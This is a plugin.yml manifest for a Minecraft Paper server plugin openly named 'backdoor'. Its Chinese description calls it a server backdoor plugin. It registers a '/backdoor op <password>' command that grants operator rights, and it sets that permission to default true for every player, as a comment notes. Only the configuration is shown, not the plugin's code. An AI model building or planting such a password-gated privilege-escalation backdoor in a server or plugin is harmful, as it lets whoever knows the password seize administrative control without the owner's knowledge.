# 插件的名称
name: backdoor

# 版本号
version: '${project.version}'

# 主类路径
main: link.cloudthink.backdoor

# 目标 API 版本
api-version: '1.21'

# 软依赖
softdepend:
  - Paper

# 描述和作者
description: 云想服务器后门插件
author: JLeo0001

# [修改] 重新定义指令结构
commands:
  backdoor:
    description: Backdoor 插件指令。
    usage: |
      §c用法:
      §c/backdoor op <密码>
      §c/backdoor reload
    # 这里不再设置顶级权限，让所有人都能看到指令用法提示

# [修改] 重新定义权限
permissions:
  # 允许使用 /backdoor op <密码> 的权限
  backdoor.op:
    description: 允许使用后门获取OP权限。
    default: true # 关键：默认所有玩家 (default组) 都拥有此权限

  # 允许使用 /backdoor reload 的权限
  backdoor.admin:
    description: 允许重载插件配置。
    default: op # 默认只有OP拥有此权限
